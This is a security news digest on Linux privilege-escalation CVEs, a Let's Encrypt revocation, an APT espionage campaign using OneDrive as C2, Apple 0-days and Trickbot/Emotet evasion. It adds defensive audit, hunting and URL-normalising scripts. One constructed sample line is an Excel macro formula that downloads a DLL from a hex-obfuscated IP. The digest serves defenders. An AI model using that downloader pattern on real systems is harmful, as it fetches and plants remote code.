New vulnerabilities in Linux
Two vulnerabilities affecting Linux systems have recently been disclosed. Both allow local privilege escalation on an unpatched system.
- CVE-2021-4034 (PwnKit): Researchers at Qualys discovered a memory corruption flaw in polkit’s pkexec, a SUID-root program installed by default on most major Linux distributions. Any unprivileged local user can exploit it to obtain root. Within hours of Qualys publishing its advisory, the first proof-of-concept (PoC) exploit was made public. Qualys recommends applying the patches that the polkit maintainers have published on GitLab; on systems that cannot be patched immediately, removing the SUID bit from pkexec (chmod 0755 /usr/bin/pkexec) is the documented temporary mitigation.
- CVE-2022-0185: A heap buffer overflow in the Linux kernel’s filesystem context code (legacy_parse_param(), reachable through the fsconfig(2) system call). It allows a local user to gain root and, in a Kubernetes environment, to escape the container and take control of the node. Exploitation requires CAP_SYS_ADMIN, but only in the caller’s own namespace, so on kernels that allow unprivileged user namespaces any local user can satisfy that requirement; disabling unprivileged user namespaces is the usual stop-gap where a patched kernel is not yet available. The researchers describe exploitation as straightforward and recommend updating as soon as possible. Crusaders of Rust (CoR), the team that discovered the flaw, has said it will publish the exploit code on its GitHub repository in the coming weeks.
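The two stop-gap mitigations above (dropping the SUID bit from pkexec, and disabling unprivileged user namespaces) are easy to audit. The script below is an added example written for this digest, not code from Qualys or Crusaders of Rust. It assumes pkexec is at /usr/bin/pkexec and that the sysctl knobs live under /proc/sys; both locations can be overridden so the checks can be run against a constructed directory. It does not tell you whether a distribution patch has been applied, only whether the preconditions each bug needs are still present.

```python
"""Audit the documented stop-gap mitigations for CVE-2021-4034 (PwnKit) and
CVE-2022-0185 on a Linux host.

Added example; not the vendors' own tooling. Assumptions:
 - pkexec lives at /usr/bin/pkexec (pass another path if it does not);
 - sysctl files live under /proc/sys (another root can be passed for testing).
"""
import os
import stat
from pathlib import Path

PKEXEC = "/usr/bin/pkexec"


def pkexec_is_setuid(path=PKEXEC):
    """True if pkexec exists and carries the set-uid bit, the precondition PwnKit needs.
    A patched pkexec is still set-uid, so a True result means 'verify the patch'."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return bool(st.st_mode & stat.S_ISUID)


def drop_pkexec_setuid(path=PKEXEC):
    """Qualys' documented workaround when no patch is available: chmod 0755 pkexec.
    Returns the resulting permission bits. Needs root on a real system."""
    os.chmod(path, 0o755)
    return stat.S_IMODE(os.stat(path).st_mode)


def unprivileged_userns_allowed(proc_sys="/proc/sys"):
    """True if an unprivileged process may create a user namespace, which is what
    hands an attacker CAP_SYS_ADMIN in their own namespace for CVE-2022-0185.

    Two knobs are consulted; a missing file means the knob does not exist here:
      kernel/unprivileged_userns_clone  (Debian/Ubuntu patch; 0 disables)
      user/max_user_namespaces          (mainline; 0 disables)
    """
    root = Path(proc_sys)
    clone = root / "kernel" / "unprivileged_userns_clone"
    if clone.exists() and clone.read_text().strip() == "0":
        return False
    maxns = root / "user" / "max_user_namespaces"
    if maxns.exists() and maxns.read_text().strip() == "0":
        return False
    return True


def audit(pkexec_path=PKEXEC, proc_sys="/proc/sys"):
    """Map each finding to True when the host is still exposed."""
    return {
        "CVE-2021-4034: pkexec is set-uid (patch or chmod 0755)": pkexec_is_setuid(pkexec_path),
        "CVE-2022-0185: unprivileged user namespaces enabled": unprivileged_userns_allowed(proc_sys),
    }


if __name__ == "__main__":
    for finding, exposed in audit().items():
        print(("EXPOSED  " if exposed else "ok       ") + finding)
```

Run it as an ordinary user to read the state; only drop_pkexec_setuid() needs root. Removing the SUID bit breaks pkexec for legitimate use, so it is a temporary measure until the distribution package is updated, after which the bit comes back with the patched binary.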
Let’s Encrypt SSL/TLS certificates revoked due to implementation error
Let’s Encrypt has announced that it will revoke certain SSL/TLS certificates on January 28th because of two discrepancies between its implementation of the TLS-ALPN-01 validation method and the specification (RFC 8737). According to the statement, only certificates issued after validation with the TLS-ALPN-01 challenge before January 26th at 00:48 UTC, when the implementation was corrected, are affected, which amounts to less than 1% of active certificates. Let’s Encrypt will contact affected subscribers with instructions for renewing their certificates. This is not the first time Let’s Encrypt users have had to act at short notice: the DST Root CA X3 root certificate, which older clients relied on to trust Let’s Encrypt’s chain, expired on September 30th, 2021.
All the details: https://community.letsencrypt.org/t/2022-01-25-issue-with-tls-alpn-01-validation-method/170450
Espionage campaign using OneDrive as C2
Researchers at Trellix have published details of a multi-stage espionage campaign targeting high-ranking government officials and defence employees in West Asia. The campaign began in October, but preparation of the infrastructure may date back as far as June. The initial access vector is an Excel document, probably delivered by email, that exploits the MSHTML remote code execution vulnerability CVE-2021-40444, which Microsoft fixed in its September 2021 security update. The exploit deploys a malware family known as Graphite, which uses the Microsoft Graph API to turn OneDrive into its Command & Control (C2) channel. Once the C2 connection is established, Empire, an open-source post-exploitation framework widely abused by attackers, is downloaded. The multi-stage infection chain, which aids evasion, together with new techniques such as the OneDrive C2, which ensures that every connection goes to a legitimate Microsoft domain, lead the researchers to assess this as a highly sophisticated campaign. Based on the targets, they point to a possible attribution to APT28 (aka Sofacy, Strontium, Fancy Bear or Sednit), a group of Russian origin.
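Because Graphite’s C2 traffic goes to graph.microsoft.com, network blocklists do not help; the useful signal is which process on the host is talking to the Graph API and what spawned it. The hunt below is an added example for this digest, not Trellix’s detection logic. It assumes host telemetry is available as one line per outbound connection in the form "timestamp host process parent destination" (for instance Sysmon network events joined with the process tree); the log lines are constructed, and EXPECTED_GRAPH_CLIENTS is a starting allowlist that has to be tuned per environment.

```python
"""Hunt for processes using the Microsoft Graph API that are not expected Graph
clients, or that were spawned by an Office application (the Excel -> MSHTML ->
Graphite chain described by Trellix).

Added example; not Trellix's own detection. Assumptions:
 - telemetry lines look like: '<timestamp> <host> <process> <parent> <dest_host>';
 - EXPECTED_GRAPH_CLIENTS is an environment-specific allowlist (starting point only).
"""
from collections import namedtuple

Event = namedtuple("Event", "ts host process parent dest")
Finding = namedtuple("Finding", "event reasons")

GRAPH_API_HOSTS = {"graph.microsoft.com"}
# Processes that legitimately call the Graph API in this (assumed) environment.
EXPECTED_GRAPH_CLIENTS = {"onedrive.exe", "teams.exe", "outlook.exe", "msedge.exe",
                          "excel.exe", "winword.exe", "powerpnt.exe"}
# Document-handling apps that should not be the parent of a new Graph client.
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}

# Constructed sample telemetry, not real data.
SAMPLE_LOG = """\
2022-01-25T09:01:12Z ws-17 onedrive.exe explorer.exe graph.microsoft.com
2022-01-25T09:02:30Z ws-17 excel.exe explorer.exe graph.microsoft.com
2022-01-25T09:02:41Z ws-17 update.exe excel.exe graph.microsoft.com
2022-01-25T09:03:05Z ws-17 msedge.exe explorer.exe graph.microsoft.com
2022-01-25T09:04:10Z ws-22 msupdate.exe explorer.exe graph.microsoft.com
2022-01-25T09:05:00Z ws-22 chrome.exe explorer.exe example.com
"""


def parse_events(text):
    """Parse whitespace-separated telemetry lines; names are lower-cased for matching."""
    events = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) != 5:
            continue  # malformed line: skip rather than crash the hunt
        ts, host, process, parent, dest = fields
        events.append(Event(ts, host, process.lower(), parent.lower(), dest.lower()))
    return events


def hunt(events):
    """Return one Finding per Graph API connection that breaks either rule."""
    findings = []
    for ev in events:
        if ev.dest not in GRAPH_API_HOSTS:
            continue
        reasons = []
        if ev.process not in EXPECTED_GRAPH_CLIENTS:
            reasons.append("unexpected process using the Graph API")
        if ev.parent in OFFICE_APPS:
            reasons.append("spawned by an Office application")
        if reasons:
            findings.append(Finding(ev, reasons))
    return findings


if __name__ == "__main__":
    for f in hunt(parse_events(SAMPLE_LOG)):
        print(f"{f.event.ts} {f.event.host} {f.event.process} (parent {f.event.parent}): "
              + "; ".join(f.reasons))
```

On the constructed sample the two hits are update.exe, which is both an unknown Graph client and a child of Excel, and msupdate.exe, which is simply an unknown Graph client; the allowlisted Office and OneDrive processes are ignored. The parent-process rule is the more robust of the two, since an attacker can rename a binary but cannot easily change the fact that the chain starts in a document viewer.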
Apple fixes new 0-day exploit used to breach iOS devices
Apple has released security updates for iOS 15.3 and iPadOS 15.3, as well as macOS Monterey 12.2, fixing two 0-day vulnerabilities.
- The first, CVE-2022-22587, is a memory corruption flaw in the IOMobileFrameBuffer kernel extension affecting iOS, iPadOS and macOS Monterey. Successful exploitation allows arbitrary code execution with kernel privileges. Apple states that it is aware of a report that the flaw may have been actively exploited.
- The second, CVE-2022-22594, is a flaw in Safari’s WebKit engine on iOS and iPadOS: the IndexedDB API violated the same-origin policy and let any website read the names of databases created by other sites. Since those names often identify the site, and in some cases embed a user identifier, a malicious page could learn which services a user was logged into and, in some cases, who they were, in real time. The bug was reported by Martin Bajanik of FingerprintJS on November 28th, made public on January 14th, and is fixed in this update.
Discover more: https://support.apple.com/en-us/HT213053
Trickbot strengthens protections to evade detection and analysis
IBM Trusteer researchers have analysed recent Trickbot campaigns in which the operators of the trojan have added further layers of protection to their web injects to hinder detection and analysis. These injections are applied in real time when a user on an infected device tries to access their online banking: they intercept and modify the data leaving the browser before it reaches the bank’s server. Most of the samples with these new capabilities were used for bank fraud, one of Trickbot’s main activities. The updates include a new server-side injection mechanism, encrypted communication with the Command & Control (C2) server, an anti-debugging feature and new ways of obfuscating and hiding the injected code. Separately, security researchers have reported that the operators of Emotet, which infects a device first and then delivers second-stage payloads such as Trickbot, have also improved their evasion by writing the IP addresses in the URLs embedded in their malicious documents in hexadecimal and octal notation, and are reportedly using the same provider of web shells on compromised websites as Trickbot, Qakbot and Squirrelwaffle. Up to 138 compromised sites have been identified.
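Hexadecimal and octal IP addresses work because browsers and download tools parse an IPv4 host leniently: each dotted component may be written in hex (0x prefix), octal (leading 0) or decimal, and fewer than four components are allowed, with the last one filling the remaining bytes. A URL filter that compares strings against a dotted-quad blocklist therefore misses them. The normaliser below is an added example for this digest, not code from IBM Trusteer or any of the cited reports; it implements the common IPv4-host parsing rules (the WHATWG URL algorithm) and rewrites such URLs to their canonical form so that the usual indicators match again. The sample text it scans is constructed.

```python
"""Normalise obfuscated IPv4 hosts (hex, octal, decimal, short forms) to dotted-quad.

Added example; not from any of the cited reports. Implements the lenient IPv4
parsing used by browsers: per component, '0x' = hex, leading '0' = octal,
otherwise decimal; one to four components, the last filling the remaining bytes.
"""
import ipaddress
import re
from urllib.parse import urlsplit, urlunsplit

_URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def _parse_ipv4_number(part):
    """Parse one dotted component; return None if it is not a valid number."""
    if part[:2].lower() == "0x":
        digits, base, pattern = part[2:], 16, r"[0-9a-fA-F]*"
    elif len(part) > 1 and part[0] == "0":
        digits, base, pattern = part[1:], 8, r"[0-7]+"
    else:
        digits, base, pattern = part, 10, r"[0-9]+"
    if not re.fullmatch(pattern, digits):
        return None
    return 0 if digits == "" else int(digits, base)  # bare '0x' parses as 0


def deobfuscate_ipv4(host):
    """Return the canonical dotted-quad for a numeric host, or None if it is not one."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()  # a single trailing dot is permitted
    if not 1 <= len(parts) <= 4:
        return None
    numbers = []
    for p in parts:
        n = _parse_ipv4_number(p)
        if n is None:
            return None
        numbers.append(n)
    # All but the last component must fit in one byte; the last fills the rest.
    if any(n > 255 for n in numbers[:-1]):
        return None
    if numbers[-1] >= 256 ** (5 - len(numbers)):
        return None
    value = numbers[-1]
    for i, n in enumerate(numbers[:-1]):
        value += n << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))


def normalise_url(url):
    """Rewrite the host of a URL to canonical dotted-quad if it is an obfuscated IPv4."""
    parts = urlsplit(url)
    host = parts.hostname
    if host is None:
        return url
    canon = deobfuscate_ipv4(host)
    if canon is None or canon == host:
        return url
    try:
        port = parts.port
    except ValueError:
        return url  # malformed port: leave the URL untouched
    netloc = canon if port is None else f"{canon}:{port}"
    return urlunsplit((parts.scheme, netloc, parts.path, parts.query, parts.fragment))


def find_obfuscated_urls(text):
    """Return (original, normalised) pairs for every URL in text whose host changes."""
    hits = []
    for m in _URL_RE.finditer(text):
        raw = m.group(0)
        fixed = normalise_url(raw)
        if fixed != raw:
            hits.append((raw, fixed))
    return hits


# Constructed sample, not a real macro or log line.
SAMPLE_TEXT = (
    "=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCBB\",0,\"http://0xb907d607/fer/fer.html\",\"c:\\\\x.dll\") "
    "and http://0056.0151.0121.0114:8080/dl plus http://example.com/ok"
)

if __name__ == "__main__":
    for raw, fixed in find_obfuscated_urls(SAMPLE_TEXT):
        print(f"{raw}  ->  {fixed}")
```

Feed proxy logs, document macros or sandbox network captures through find_obfuscated_urls() before matching against indicators; rejecting any URL whose host normalises to something different from how it was written is itself a reasonable detection, since legitimate software essentially never writes addresses this way.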
All the details: https://securityintelligence.com/posts/trickbot-bolsters-layered-defenses-prevent-injection/